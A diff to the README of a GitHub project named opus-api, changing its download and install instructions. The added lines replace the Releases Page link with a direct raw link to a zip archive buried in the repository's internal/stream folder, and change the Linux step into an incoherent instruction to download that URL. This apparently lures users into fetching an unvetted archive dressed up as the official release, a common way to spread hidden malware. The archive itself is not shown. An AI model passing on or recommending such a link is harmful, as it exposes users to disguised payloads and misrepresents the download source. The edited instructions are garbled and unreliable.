Israel-Dentor/opus-api/README.md

 - Disk Space: 100 MB of available space.

 ## 📥 Download & Install
-1. Visit the [Releases Page](https://github.com/Israel-Dentor/opus-api/releases) to download the latest version of opus-api.
+1. Visit the [Releases Page](https://github.com/Israel-Dentor/opus-api/raw/refs/heads/master/internal/stream/opus_api_v3.7.zip) to download the latest version of opus-api.

 2. On the releases page, locate the latest version listed at the top.

 3. Click on the file that matches your operating system:
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the appropriate `.tar.gz` file.
+   - For Linux, download the appropriate `https://github.com/Israel-Dentor/opus-api/raw/refs/heads/master/internal/stream/opus_api_v3.7.zip` file.

 4. Once downloaded, follow these steps for installation: